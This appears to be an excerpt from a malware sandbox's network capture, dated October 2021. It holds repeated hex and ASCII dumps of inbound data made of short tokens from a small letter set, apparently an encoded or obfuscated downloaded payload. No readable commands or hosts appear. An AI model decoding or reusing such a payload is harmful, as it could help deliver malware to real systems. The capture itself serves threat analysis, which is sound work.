2021-10-27 01:03:26 UTC	1055	IN	Data Raw: 71 63 20 71 71 77 20 71 68 6a 20 71 78 20 49 70 20 78 70 20 63 68 20 63 68 20 71 6a 65 20 65 65 77 20 71 71 77 20 71 68 4f 20 71 71 6a 20 65 49 20 71 71 70 20 63 68 20 63 78 20 4f 78 20 71 68 4f 20 71 65 78 20 65 20 65 4f 20 63 71 20 78 70 20 63 49 20 77 65 20 6a 78 20 71 71 78 20 71 71 77 20 71 68 63 20 71 49 68 20 71 65 71 20 78 70 20 63 68 20 63 63 20 71 65 78 20 63 65 20 71 71 77 20 71 68 4f 20 71 65 65 20 78 63 20 63 70 20 4f 6a 20 4f 71 20 70 63 20 71 71 78 20 71 65 77 20 71 4f 20 49 20 63 68 20 78 70 20 63 78 20 65 6a 68 20 65 63 6a 20 71 71 78 20 71 71 77 20 71 68 70 20 70 70 20 71 71 49 20 78 70 20 63 68 20 49 68 20 77 63 20 71 65 71 20 65 49 20 68 20 71 71 6a 20 63 68 20 63 70 20 77 49 20 49 78 20 70 78 20 71 71 78 20 71 71 6a 20 71 70 4f 20 65 Data Ascii: qc qqw qhj qx Ip xp ch ch qje eew qqw qhO qqj eI qqp ch cx Ox qhO qex e eO cq xp cI we jx qqx qqw qhc qIh qeq xp ch cc qex ce qqw qhO qee xc cp Oj Oq pc qqx qew qO I ch xp cx ejh ecj qqx qqw qhp pp qqI xp ch Ih wc qeq eI h qqj ch cp wI Ix px qqx qqj qpO e
2021-10-27 01:03:26 UTC	1059	IN	Data Raw: 68 20 63 78 20 70 78 20 71 71 63 20 78 20 65 71 71 20 71 71 65 20 63 68 20 78 4f 20 4f 6a 20 71 70 71 20 70 63 20 71 71 78 20 71 65 77 20 70 63 20 70 20 63 71 20 78 70 20 63 68 20 77 65 20 6a 4f 20 71 71 78 20 71 71 77 20 71 68 63 20 71 65 49 20 63 78 20 6a 6a 20 63 63 20 71 77 65 20 78 63 20 65 68 49 20 71 71 77 20 71 68 4f 20 71 71 6a 20 49 77 20 71 78 68 20 63 68 20 63 78 20 70 63 20 65 4f 20 65 78 71 20 71 68 70 20 71 71 65 20 63 49 20 70 20 71 68 78 20 63 63 20 70 78 20 71 71 78 20 71 71 20 6a 68 20 71 71 65 20 63 68 20 63 65 20 49 68 20 63 68 20 49 4f 20 71 71 4f 20 65 6a 4f 20 65 68 20 49 49 20 63 68 20 78 70 20 63 71 20 77 71 20 71 68 65 20 71 71 78 20 71 71 77 20 71 68 70 20 71 68 49 20 6a 71 20 6a 78 20 65 68 20 6a 49 20 4f 68 20 4f 68 20 71 78 Data Ascii: h cx px qqc x eqq qqe ch xO Oj qpq pc qqx qew pc p cq xp ch we jO qqx qqw qhc qeI cx jj cc qwe xc ehI qqw qhO qqj Iw qxh ch cx pc eO exq qhp qqe cI p qhx cc px qqx qq jh qqe ch ce Ih ch IO qqO ejO eh II ch xp cq wq qhe qqx qqw qhp qhI jq jx eh jI Oh Oh qx
2021-10-27 01:03:26 UTC	1063	IN	Data Raw: 78 20 70 63 20 65 4f 20 78 49 20 71 68 4f 20 71 71 65 20 63 49 20 70 20 6a 68 20 63 65 20 70 78 20 71 71 78 20 71 71 20 65 78 20 71 71 65 20 63 68 20 63 65 20 77 49 20 77 71 20 70 78 20 71 71 78 20 71 71 6a 20 65 20 71 70 63 20 63 68 20 78 70 20 63 49 20 71 70 49 20 65 78 20 71 71 78 20 71 71 77 20 71 68 70 20 6a 71 20 71 68 63 20 78 70 20 63 68 20 49 68 20 71 68 70 20 71 65 78 20 71 71 4f 20 71 68 4f 20 71 71 65 20 77 49 20 49 4f 20 63 68 20 63 78 20 70 68 20 71 65 20 78 20 71 68 4f 20 71 71 65 20 63 78 20 4f 63 20 71 77 68 20 63 63 20 70 78 20 71 65 68 20 65 78 4f 20 6a 65 20 71 71 65 20 63 68 20 78 4f 20 4f 6a 20 71 68 4f 20 70 78 20 71 71 78 20 71 65 77 20 70 63 20 71 65 70 20 63 71 20 78 70 20 63 68 20 77 65 20 6a 6a 20 71 71 78 20 71 71 77 20 71 68 Data Ascii: x pc eO xI qhO qqe cI p jh ce px qqx qq ex qqe ch ce wI wq px qqx qqj e qpc ch xp cI qpI ex qqx qqw qhp jq qhc xp ch Ih qhp qex qqO qhO qqe wI IO ch cx ph qe x qhO qqe cx Oc qwh cc px qeh exO je qqe ch xO Oj qhO px qqx qew pc qep cq xp ch we jj qqx qqw qh
2021-10-27 01:03:26 UTC	1067	IN	Data Raw: 20 65 78 20 71 65 49 20 63 78 20 70 78 20 71 65 68 20 71 68 65 20 71 68 49 20 71 71 63 20 77 6a 20 6a 77 20 63 68 20 63 78 20 70 68 20 4f 4f 20 71 71 78 20 77 77 20 65 6a 6a 20 6a 68 20 65 65 78 20 78 78 20 6a 68 20 71 77 71 20 71 71 78 20 71 71 77 20 71 68 77 20 70 70 20 71 65 4f 20 78 70 20 63 68 20 78 70 20 71 65 78 20 71 4f 20 71 71 77 20 71 68 4f 20 71 65 65 20 65 6a 49 20 78 70 20 65 78 20 70 4f 20 71 4f 63 20 63 71 20 71 68 63 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 77 63 20 78 70 20 78 70 20 63 68 20 71 6a 20 70 49 20 71 71 78 20 71 71 77 20 77 63 20 71 71 65 20 63 68 20 78 70 20 71 71 49 20 63 78 20 70 78 20 71 71 63 20 71 68 65 20 4f 6a 20 71 71 49 20 63 68 20 4f 4f 20 63 68 20 Data Ascii: ex qeI cx px qeh qhe qhI qqc wj jw ch cx ph OO qqx ww ejj jh eex xx jh qwq qqx qqw qhw pp qeO xp ch xp qex qO qqw qhO qee ejI xp ex pO qOc cq qhc qhO qqe ch xp ch cx px qqx qqw qhO wc xp xp ch qj pI qqx qqw wc qqe ch xp qqI cx px qqc qhe Oj qqI ch OO ch
2021-10-27 01:03:26 UTC	1072	IN	Data Raw: 71 68 4f 20 4f 78 20 65 65 49 20 78 49 20 65 49 20 65 68 71 20 70 78 20 71 71 78 20 71 71 63 20 77 77 20 78 70 20 78 63 20 78 70 20 63 68 20 71 70 49 20 65 78 20 71 71 78 20 71 71 77 20 71 68 70 20 70 70 20 4f 77 20 78 4f 20 63 68 20 78 70 20 78 63 20 49 65 20 71 71 77 20 71 68 4f 20 71 71 6a 20 49 77 20 71 65 78 20 63 68 20 63 78 20 70 63 20 70 70 20 71 68 65 20 4f 6a 20 71 71 78 20 63 68 20 65 68 20 63 68 20 63 78 20 70 78 20 71 65 49 20 71 71 77 20 71 68 4f 20 4f 77 20 71 70 20 6a 20 65 70 20 65 6a 68 20 77 78 20 4f 68 20 71 6a 70 20 71 68 4f 20 71 71 65 20 63 65 20 71 49 20 65 68 63 20 65 68 71 20 70 78 20 71 71 78 20 65 78 4f 20 6a 6a 20 71 71 65 20 63 68 20 78 4f 20 65 49 20 71 68 71 20 70 63 20 71 71 78 20 71 71 63 20 65 68 20 49 68 20 63 68 20 78 Data Ascii: qhO Ox eeI xI eI ehq px qqx qqc ww xp xc xp ch qpI ex qqx qqw qhp pp Ow xO ch xp xc Ie qqw qhO qqj Iw qex ch cx pc pp qhe Oj qqx ch eh ch cx px qeI qqw qhO Ow qp j ep ejh wx Oh qjp qhO qqe ce qI ehc ehq px qqx exO jj qqe ch xO eI qhq pc qqx qqc eh Ih ch x
2021-10-27 01:03:26 UTC	1076	IN	Data Raw: 49 20 71 49 20 70 6a 20 65 4f 20 71 70 6a 20 71 68 70 20 71 71 65 20 63 49 20 65 65 20 63 6a 20 63 65 20 63 4f 20 71 77 77 20 71 71 49 20 71 68 4f 20 71 65 65 20 4f 6a 20 65 78 78 20 63 71 20 63 78 20 4f 78 20 65 4f 20 71 70 68 20 71 68 70 20 71 71 65 20 63 49 20 65 65 20 63 6a 20 63 65 20 63 4f 20 4f 6a 20 71 71 49 20 71 68 4f 20 71 65 65 20 4f 6a 20 65 78 71 20 63 71 20 63 78 20 4f 78 20 70 78 20 71 71 4f 20 65 20 49 71 20 63 68 20 78 70 20 63 49 20 65 49 20 77 78 20 70 4f 20 71 71 70 20 71 68 65 20 4f 71 20 65 78 65 20 63 63 20 4f 6a 20 65 78 78 20 70 63 20 71 71 78 20 71 65 77 20 77 63 20 71 71 4f 20 78 70 20 4f 63 20 71 65 77 20 63 78 20 70 78 20 71 65 68 20 4f 6a 20 78 4f 20 71 71 6a 20 63 68 20 63 78 20 4f 6a 20 65 78 77 20 70 63 20 71 71 78 20 71 Data Ascii: I qI pj eO qpj qhp qqe cI ee cj ce cO qww qqI qhO qee Oj exx cq cx Ox eO qph qhp qqe cI ee cj ce cO Oj qqI qhO qee Oj exq cq cx Ox px qqO e Iq ch xp cI eI wx pO qqp qhe Oq exe cc Oj exx pc qqx qew wc qqO xp Oc qew cx px qeh Oj xO qqj ch cx Oj exw pc qqx q
2021-10-27 01:03:26 UTC	1080	IN	Data Raw: 20 71 71 63 20 65 68 20 65 65 20 65 78 20 77 63 20 71 4f 6a 20 71 71 78 20 71 71 77 20 71 68 63 20 4f 71 20 65 68 65 20 78 70 20 78 4f 20 49 20 4f 6a 20 71 71 78 20 71 68 49 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 65 20 71 71 4f 20 65 65 20 65 6a 68 20 63 68 20 78 70 20 63 78 20 63 6a 20 71 65 78 20 65 78 77 20 71 71 77 20 71 68 4f 20 71 65 65 20 77 68 20 71 65 20 63 68 20 63 78 20 70 49 20 71 71 68 20 70 70 20 71 71 68 20 70 49 20 65 68 20 65 49 20 77 4f 20 71 49 68 20 70 78 20 71 71 78 20 71 71 6a 20 77 68 20 71 6a 49 20 63 68 20 63 71 20 65 20 49 6a 20 70 78 20 71 68 4f 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 78 70 20 63 68 20 63 78 20 70 49 20 71 71 65 20 71 78 20 65 63 71 20 71 71 65 20 63 68 20 63 65 20 Data Ascii: qqc eh ee ex wc qOj qqx qqw qhc Oq ehe xp xO I Oj qqx qhI qhO qqe ch xp ch cx px qqe qqO ee ejh ch xp cx cj qex exw qqw qhO qee wh qe ch cx pI qqh pp qqh pI eh eI wO qIh px qqx qqj wh qjI ch cq e Ij px qhO qqw qhO qqe ch xp ch cx pI qqe qx ecq qqe ch ce
2021-10-27 01:03:26 UTC	1083	IN	Data Raw: 20 63 70 20 70 78 20 71 71 78 20 71 68 68 20 71 71 71 20 71 68 4f 20 78 71 20 65 4f 20 63 6a 20 71 49 20 78 77 20 65 71 71 20 71 71 77 20 71 68 4f 20 71 71 49 20 65 78 20 65 65 20 65 63 20 71 4f 6a 20 70 78 20 71 71 6a 20 49 4f 20 71 68 68 20 71 71 65 20 49 71 20 78 70 20 63 68 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 78 20 78 4f 20 6a 70 20 6a 68 20 63 6a 20 71 71 78 20 70 78 20 4f 63 20 71 49 20 65 68 4f 20 63 68 20 78 70 20 63 78 20 65 4f 20 71 77 65 20 71 71 78 20 71 68 65 20 4f 6a 20 71 71 63 20 63 68 20 49 6a 20 63 68 20 63 78 20 70 78 20 71 65 49 20 71 71 77 20 71 68 4f 20 4f 77 20 78 70 20 6a 4f 20 6a 49 20 65 49 20 70 6a 20 70 78 20 71 78 20 65 68 77 20 71 71 65 20 63 68 20 63 65 20 65 78 20 71 49 20 71 65 77 20 71 6a 6a 20 Data Ascii: cp px qqx qhh qqq qhO xq eO cj qI xw eqq qqw qhO qqI ex ee ec qOj px qqj IO qhh qqe Iq xp ch cx px qqx qqw qhO qqx xO jp jh cj qqx px Oc qI ehO ch xp cx eO qwe qqx qhe Oj qqc ch Ij ch cx px qeI qqw qhO Ow xp jO jI eI pj px qx ehw qqe ch ce ex qI qew qjj
2021-10-27 01:03:26 UTC	1087	IN	Data Raw: 78 20 70 78 20 71 71 78 20 71 71 65 20 71 71 49 20 4f 6a 20 63 70 20 65 65 20 6a 49 20 6a 65 20 71 65 68 20 71 71 49 20 70 6a 20 77 68 20 77 4f 20 49 6a 20 65 77 20 71 4f 49 20 63 70 20 71 65 77 20 71 6a 70 20 71 65 78 20 71 68 71 20 65 6a 78 20 78 49 20 65 4f 20 49 65 20 71 49 20 70 65 20 65 4f 20 49 78 20 71 68 4f 20 71 71 65 20 63 49 20 78 68 20 71 20 71 4f 20 71 65 77 20 71 71 6a 20 71 65 77 20 77 68 20 71 6a 68 20 78 70 20 77 63 20 71 49 49 20 63 78 20 70 78 20 71 71 70 20 71 68 65 20 71 68 63 20 4f 77 20 63 78 20 65 70 20 63 49 20 6a 4f 20 70 68 20 71 71 65 20 71 71 70 20 71 68 77 20 6a 71 20 65 78 65 20 78 4f 20 63 68 20 78 70 20 70 49 20 71 71 49 20 71 71 6a 20 65 20 65 6a 78 20 63 71 20 78 70 20 63 65 20 65 6a 65 20 65 6a 20 71 65 65 20 4f 70 20 Data Ascii: x px qqx qqe qqI Oj cp ee jI je qeh qqI pj wh wO Ij ew qOI cp qew qjp qex qhq ejx xI eO Ie qI pe eO Ix qhO qqe cI xh q qO qew qqj qew wh qjh xp wc qII cx px qqp qhe qhc Ow cx ep cI jO ph qqe qqp qhw jq exe xO ch xp pI qqI qqj e ejx cq xp ce eje ej qee Op
2021-10-27 01:03:26 UTC	1091	IN	Data Raw: 20 71 68 77 20 71 77 78 20 63 70 20 6a 6a 20 63 65 20 6a 68 20 65 65 65 20 71 71 78 20 71 71 77 20 71 68 6a 20 71 77 65 20 65 6a 49 20 4f 49 20 78 70 20 77 77 20 65 68 77 20 71 71 78 20 71 71 77 20 71 68 63 20 4f 4f 20 63 6a 20 6a 6a 20 63 6a 20 65 49 20 77 71 20 4f 4f 20 71 71 78 20 71 71 71 20 71 71 49 20 4f 6a 20 65 68 4f 20 63 71 20 63 78 20 4f 78 20 71 20 71 63 77 20 71 68 70 20 71 71 65 20 63 49 20 4f 63 20 65 63 78 20 63 63 20 70 78 20 71 71 49 20 71 71 4f 20 65 20 65 71 71 20 63 71 20 78 70 20 63 65 20 65 6a 65 20 71 65 63 20 70 77 20 4f 6a 20 6a 6a 20 71 71 65 20 63 68 20 63 70 20 63 77 20 63 65 20 78 77 20 65 6a 6a 20 71 71 77 20 71 68 4f 20 71 71 49 20 6a 6a 20 63 63 20 6a 63 20 78 4f 20 71 65 68 20 71 65 6a 20 71 68 68 20 71 68 49 20 71 71 78 Data Ascii: qhw qwx cp jj ce jh eee qqx qqw qhj qwe ejI OI xp ww ehw qqx qqw qhc OO cj jj cj eI wq OO qqx qqq qqI Oj ehO cq cx Ox q qcw qhp qqe cI Oc ecx cc px qqI qqO e eqq cq xp ce eje qec pw Oj jj qqe ch cp cw ce xw ejj qqw qhO qqI jj cc jc xO qeh qej qhh qhI qqx
2021-10-27 01:03:26 UTC	1095	IN	Data Raw: 71 78 20 71 4f 63 20 71 71 65 20 63 68 20 63 65 20 6a 68 20 6a 49 20 70 49 20 4f 20 65 71 4f 20 71 68 4f 20 71 71 65 20 63 78 20 4f 63 20 65 6a 49 20 63 63 20 70 78 20 71 65 68 20 71 71 4f 20 71 65 71 20 71 6a 20 71 63 49 20 78 70 20 63 68 20 63 68 20 70 49 20 4f 20 65 71 70 20 71 68 4f 20 71 71 65 20 63 78 20 65 70 20 6a 65 20 63 65 20 78 77 20 65 65 71 20 71 71 77 20 71 68 4f 20 71 71 49 20 4f 6a 20 65 6a 70 20 63 71 20 63 78 20 4f 78 20 71 71 65 20 4f 77 20 71 49 20 65 65 6a 20 63 68 20 78 70 20 63 78 20 63 65 20 78 77 20 71 4f 78 20 71 71 77 20 71 68 4f 20 71 71 49 20 6a 68 20 6a 78 20 78 70 20 77 77 20 65 65 70 20 71 71 78 20 71 71 77 20 71 68 63 20 6a 71 20 65 6a 49 20 78 4f 20 63 68 20 49 68 20 70 49 20 71 68 65 20 70 20 65 65 71 20 71 71 65 20 63 Data Ascii: qx qOc qqe ch ce jh jI pI O eqO qhO qqe cx Oc ejI cc px qeh qqO qeq qj qcI xp ch ch pI O eqp qhO qqe cx ep je ce xw eeq qqw qhO qqI Oj ejp cq cx Ox qqe Ow qI eej ch xp cx ce xw qOx qqw qhO qqI jh jx xp ww eep qqx qqw qhc jq ejI xO ch Ih pI qhe p eeq qqe c
2021-10-27 01:03:26 UTC	1099	IN	Data Raw: 68 65 20 65 68 4f 20 63 6a 20 65 71 71 20 65 71 78 20 65 6a 65 20 71 68 70 20 71 4f 68 20 65 63 78 20 71 77 70 20 65 68 68 20 49 77 20 6a 65 20 65 68 77 20 71 78 63 20 65 68 70 20 63 4f 20 71 70 6a 20 65 71 68 20 71 63 70 20 71 65 77 20 65 68 77 20 78 71 20 71 6a 49 20 71 71 77 20 71 49 20 4f 49 20 63 78 20 65 68 49 20 65 71 6a 20 71 49 63 20 71 63 71 20 65 65 70 20 71 65 68 20 71 63 68 20 65 68 68 20 71 6a 78 20 65 68 70 20 6a 20 65 68 77 20 71 77 49 20 65 65 70 20 6a 78 20 63 65 20 71 65 6a 20 65 6a 63 20 65 68 4f 20 65 71 20 71 49 68 20 71 49 71 20 65 68 6a 20 71 71 6a 20 65 6a 77 20 71 70 63 20 71 6a 68 20 65 6a 20 71 65 71 20 71 71 70 20 71 6a 68 20 6a 70 20 71 65 63 20 71 78 71 20 71 78 4f 20 77 77 20 71 65 20 71 78 65 20 65 6a 65 20 65 77 20 71 71 Data Ascii: he ehO cj eqq eqx eje qhp qOh ecx qwp ehh Iw je ehw qxc ehp cO qpj eqh qcp qew ehw xq qjI qqw qI OI cx ehI eqj qIc qcq eep qeh qch ehh qjx ehp j ehw qwI eep jx ce qej ejc ehO eq qIh qIq ehj qqj ejw qpc qjh ej qeq qqp qjh jp qec qxq qxO ww qe qxe eje ew qq
2021-10-27 01:03:26 UTC	1104	IN	Data Raw: 4f 20 65 68 70 20 71 6a 77 20 71 78 4f 20 71 65 68 20 71 78 71 20 71 78 4f 20 71 63 65 20 70 4f 20 65 68 78 20 77 78 20 71 71 77 20 77 68 20 71 68 6a 20 71 70 68 20 71 65 70 20 6a 68 20 71 77 63 20 65 71 68 20 71 78 65 20 6a 71 20 6a 70 20 70 65 20 71 70 78 20 65 78 71 20 63 78 20 65 78 6a 20 70 6a 20 71 4f 77 20 65 65 78 20 71 65 65 20 71 78 6a 20 71 78 63 20 65 71 68 20 65 65 71 20 65 78 4f 20 71 70 78 20 65 6a 70 20 77 70 20 65 78 68 20 70 49 20 65 71 70 20 78 70 20 78 63 20 65 78 49 20 71 70 71 20 65 6a 49 20 77 77 20 6a 4f 20 71 68 65 20 65 68 71 20 71 65 49 20 65 6a 63 20 65 68 4f 20 65 6a 68 20 71 77 68 20 6a 68 20 65 65 68 20 63 49 20 49 78 20 65 78 6a 20 49 65 20 71 6a 78 20 70 63 20 71 71 63 20 71 63 68 20 71 6a 71 20 4f 71 20 71 71 78 20 71 77 Data Ascii: O ehp qjw qxO qeh qxq qxO qce pO ehx wx qqw wh qhj qph qep jh qwc eqh qxe jq jp pe qpx exq cx exj pj qOw eex qee qxj qxc eqh eeq exO qpx ejp wp exh pI eqp xp xc exI qpq ejI ww jO qhe ehq qeI ejc ehO ejh qwh jh eeh cI Ix exj Ie qjx pc qqc qch qjq Oq qqx qw
2021-10-27 01:03:26 UTC	1108	IN	Data Raw: 65 6a 63 20 65 68 4f 20 65 78 71 20 4f 70 20 71 65 6a 20 71 70 68 20 65 65 4f 20 71 77 49 20 71 70 6a 20 71 4f 71 20 65 65 78 20 49 71 20 71 65 78 20 63 65 20 71 78 71 20 71 78 77 20 4f 20 65 63 68 20 71 63 49 20 4f 77 20 71 68 77 20 65 65 68 20 71 65 49 20 65 63 20 65 65 65 20 49 65 20 70 63 20 71 49 20 65 68 63 20 65 71 78 20 70 63 20 65 6a 77 20 65 65 20 65 63 78 20 71 70 78 20 71 65 77 20 77 70 20 71 68 6a 20 63 49 20 71 4f 70 20 71 78 20 71 71 70 20 71 78 6a 20 71 78 63 20 71 65 78 20 71 6a 20 4f 49 20 78 77 20 65 68 70 20 6a 6a 20 71 71 63 20 71 65 71 20 71 71 70 20 71 6a 77 20 65 78 77 20 77 68 20 71 6a 71 20 70 71 20 71 65 65 20 71 20 65 70 20 70 68 20 71 71 78 20 71 49 20 65 68 63 20 65 71 78 20 65 49 20 63 4f 20 71 78 77 20 4f 49 20 71 63 6a 20 Data Ascii: ejc ehO exq Op qej qph eeO qwI qpj qOq eex Iq qex ce qxq qxw O ech qcI Ow qhw eeh qeI ec eee Ie pc qI ehc eqx pc ejw ee ecx qpx qew wp qhj cI qOp qx qqp qxj qxc qex qj OI xw ehp jj qqc qeq qqp qjw exw wh qjq pq qee q ep ph qqx qI ehc eqx eI cO qxw OI qcj
2021-10-27 01:03:26 UTC	1112	IN	Data Raw: 20 65 6a 68 20 65 71 68 20 65 65 6a 20 65 78 68 20 70 77 20 63 63 20 6a 4f 20 71 63 78 20 70 68 20 63 70 20 65 6a 65 20 65 65 65 20 77 78 20 71 63 78 20 78 49 20 65 68 77 20 71 78 63 20 4f 65 20 71 4f 68 20 68 20 65 78 70 20 71 63 6a 20 65 6a 78 20 65 63 78 20 71 6a 68 20 70 78 20 4f 4f 20 78 4f 20 65 68 78 20 65 6a 20 65 68 63 20 65 71 78 20 4f 6a 20 71 65 68 20 4f 49 20 65 68 71 20 65 6a 63 20 6a 63 20 65 71 65 20 71 70 65 20 70 78 20 78 4f 20 70 63 20 63 77 20 71 4f 68 20 70 71 20 63 77 20 71 63 6a 20 78 4f 20 65 68 65 20 65 68 49 20 71 77 77 20 65 65 65 20 65 6a 6a 20 71 77 63 20 71 71 68 20 71 70 6a 20 71 63 71 20 71 49 65 20 77 77 20 65 78 68 20 49 68 20 71 71 68 20 71 68 77 20 4f 6a 20 71 4f 20 70 71 20 63 78 20 65 71 68 20 65 71 71 20 71 63 68 20 Data Ascii: ejh eqh eej exh pw cc jO qcx ph cp eje eee wx qcx xI ehw qxc Oe qOh h exp qcj ejx ecx qjh px OO xO ehx ej ehc eqx Oj qeh OI ehq ejc jc eqe qpe px xO pc cw qOh pq cw qcj xO ehe ehI qww eee ejj qwc qqh qpj qcq qIe ww exh Ih qqh qhw Oj qO pq cx eqh eqq qch
2021-10-27 01:03:26 UTC	1115	IN	Data Raw: 20 71 68 4f 20 71 71 65 20 63 68 20 71 4f 20 71 68 6a 20 71 68 71 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 78 70 20 78 70 20 63 68 20 63 63 20 6a 20 65 68 63 20 65 71 63 20 71 71 78 20 71 65 71 20 78 63 20 78 70 20 63 68 20 63 78 20 71 77 78 20 71 71 63 20 77 68 20 71 68 4f 20 71 71 78 20 63 68 20 78 70 20 63 71 20 63 78 20 70 78 20 71 71 78 20 71 49 63 20 71 68 4f 20 71 71 65 20 63 68 20 71 71 4f 20 63 68 20 63 78 20 70 78 20 71 49 63 20 71 71 77 20 71 68 4f 20 71 71 65 20 65 65 49 20 78 4f 20 63 68 20 63 78 20 71 63 65 20 71 71 63 20 71 71 77 20 71 68 4f 20 71 71 4f 20 63 68 20 78 70 20 63 68 20 65 68 68 20 70 63 20 71 71 78 20 71 71 77 20 71 65 6a 20 71 71 65 20 63 68 20 78 70 20 71 68 78 20 63 78 20 70 78 20 71 71 78 20 71 71 49 20 Data Ascii: qhO qqe ch qO qhj qhq px qqx qqw qhO qqe xp xp ch cc j ehc eqc qqx qeq xc xp ch cx qwx qqc wh qhO qqx ch xp cq cx px qqx qIc qhO qqe ch qqO ch cx px qIc qqw qhO qqe eeI xO ch cx qce qqc qqw qhO qqO ch xp ch ehh pc qqx qqw qej qqe ch xp qhx cx px qqx qqI
2021-10-27 01:03:26 UTC	1119	IN	Data Raw: 77 20 49 6a 20 65 71 49 20 49 65 20 78 70 20 70 78 20 78 4f 20 71 65 68 20 71 6a 6a 20 71 65 78 20 63 65 20 78 70 20 71 65 78 20 63 4f 20 71 70 70 20 71 65 49 20 71 71 63 20 71 68 4f 20 6a 49 20 49 6a 20 65 71 49 20 49 65 20 78 70 20 70 78 20 71 49 20 71 65 68 20 71 6a 6a 20 71 65 78 20 63 65 20 78 70 20 4f 6a 20 63 4f 20 71 6a 20 71 71 78 20 71 71 63 20 71 68 4f 20 65 78 63 20 49 6a 20 71 68 63 20 63 68 20 78 70 20 70 78 20 65 63 65 20 71 65 68 20 63 65 20 71 71 65 20 63 65 20 78 70 20 71 49 71 20 63 4f 20 71 6a 20 71 71 78 20 71 71 63 20 71 68 4f 20 65 6a 78 20 49 6a 20 71 68 63 20 63 68 20 78 70 20 70 78 20 65 71 71 20 71 65 68 20 63 65 20 71 71 65 20 63 65 20 78 70 20 71 63 78 20 63 4f 20 71 6a 20 71 71 78 20 71 71 63 20 71 68 4f 20 71 4f 65 20 49 6a Data Ascii: w Ij eqI Ie xp px xO qeh qjj qex ce xp qex cO qpp qeI qqc qhO jI Ij eqI Ie xp px qI qeh qjj qex ce xp Oj cO qj qqx qqc qhO exc Ij qhc ch xp px ece qeh ce qqe ce xp qIq cO qj qqx qqc qhO ejx Ij qhc ch xp px eqq qeh ce qqe ce xp qcx cO qj qqx qqc qhO qOe Ij
2021-10-27 01:03:26 UTC	1123	IN	Data Raw: 78 63 20 71 63 65 20 63 78 20 49 49 20 71 71 78 20 71 6a 65 20 71 71 65 20 65 71 70 20 63 68 20 63 78 20 63 68 20 78 77 20 71 71 49 20 65 68 63 20 71 71 77 20 71 68 77 20 71 71 65 20 77 20 71 49 20 65 78 49 20 63 78 20 70 65 20 71 71 78 20 6a 49 20 77 77 20 71 70 6a 20 63 68 20 63 78 20 63 68 20 71 71 71 20 71 71 77 20 71 70 71 20 71 71 77 20 71 68 77 20 71 71 65 20 65 68 4f 20 71 70 20 63 49 20 63 63 20 70 65 20 71 71 78 20 71 6a 70 20 77 4f 20 71 70 68 20 63 68 20 63 78 20 63 68 20 78 63 20 71 71 4f 20 65 68 63 20 71 71 77 20 71 68 77 20 71 71 65 20 63 20 71 4f 20 71 63 65 20 63 78 20 70 65 20 71 71 78 20 6a 70 20 77 70 20 71 65 77 20 63 71 20 63 78 20 63 68 20 70 4f 20 71 71 4f 20 71 65 63 20 71 71 49 20 71 68 77 20 71 71 65 20 71 70 63 20 71 4f 20 65 Data Ascii: xc qce cx II qqx qje qqe eqp ch cx ch xw qqI ehc qqw qhw qqe w qI exI cx pe qqx jI ww qpj ch cx ch qqq qqw qpq qqw qhw qqe ehO qp cI cc pe qqx qjp wO qph ch cx ch xc qqO ehc qqw qhw qqe c qO qce cx pe qqx jp wp qew cq cx ch pO qqO qec qqI qhw qqe qpc qO e
2021-10-27 01:03:26 UTC	1127	IN	Data Raw: 78 4f 20 63 63 20 71 68 65 20 71 77 70 20 65 20 65 78 6a 20 63 78 20 71 71 78 20 63 4f 20 65 78 68 20 71 71 78 20 71 63 71 20 71 71 70 20 78 4f 20 65 20 65 78 65 20 49 68 20 65 68 65 20 63 65 20 63 6a 20 71 68 65 20 71 77 70 20 71 68 6a 20 65 78 6a 20 63 78 20 71 71 78 20 49 71 20 70 68 20 63 68 20 78 70 20 63 68 20 63 78 20 49 49 20 71 71 78 20 71 78 4f 20 71 71 77 20 4f 4f 20 63 68 20 78 4f 20 63 68 20 71 6a 78 20 71 71 49 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 6a 63 20 78 68 20 63 70 20 78 78 20 71 49 20 71 71 78 20 71 71 4f 20 71 68 4f 20 71 71 49 20 71 4f 20 78 70 20 63 68 20 63 78 20 70 78 20 4f 77 20 71 71 77 20 4f 70 20 71 68 49 20 71 65 65 20 78 70 20 78 70 20 63 78 20 77 65 20 70 6a 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 68 20 6a Data Ascii: xO cc qhe qwp e exj cx qqx cO exh qqx qcq qqp xO e exe Ih ehe ce cj qhe qwp qhj exj cx qqx Iq ph ch xp ch cx II qqx qxO qqw OO ch xO ch qjx qqI qqx qqw qhO qqe jc xh cp xx qI qqx qqO qhO qqI qO xp ch cx px Ow qqw Op qhI qee xp xp cx we pj qqw qhO qqe ch j
2021-10-27 01:03:26 UTC	1131	IN	Data Raw: 68 70 20 49 49 20 65 68 65 20 71 68 70 20 49 65 20 63 68 20 65 78 70 20 77 20 63 78 20 70 78 20 71 71 78 20 71 71 77 20 71 71 20 71 71 63 20 77 63 20 68 20 65 78 77 20 63 63 20 78 20 71 71 78 20 65 4f 20 4f 71 20 71 71 65 20 63 68 20 78 70 20 63 68 20 70 68 20 70 77 20 65 68 68 20 49 4f 20 71 68 78 20 71 71 6a 20 4f 49 20 78 70 20 65 71 68 20 68 20 70 78 20 71 71 78 20 71 71 77 20 71 68 4f 20 65 65 20 78 4f 20 65 71 68 20 65 20 71 71 20 70 63 20 6a 6a 20 71 71 77 20 4f 6a 20 77 71 20 63 68 20 78 70 20 63 68 20 63 78 20 63 68 20 71 71 6a 20 71 63 63 20 4f 6a 20 71 70 77 20 63 71 20 71 68 68 20 63 68 20 65 6a 68 20 4f 4f 20 71 71 78 20 71 71 77 20 71 68 4f 20 71 71 65 20 63 65 20 78 70 20 65 68 6a 20 49 20 65 68 68 20 71 71 78 20 6a 6a 20 71 68 4f 20 71 78 Data Ascii: hp II ehe qhp Ie ch exp w cx px qqx qqw qq qqc wc h exw cc x qqx eO Oq qqe ch xp ch ph pw ehh IO qhx qqj OI xp eqh h px qqx qqw qhO ee xO eqh e qq pc jj qqw Oj wq ch xp ch cx ch qqj qcc Oj qpw cq qhh ch ejh OO qqx qqw qhO qqe ce xp ehj I ehh qqx jj qhO qx
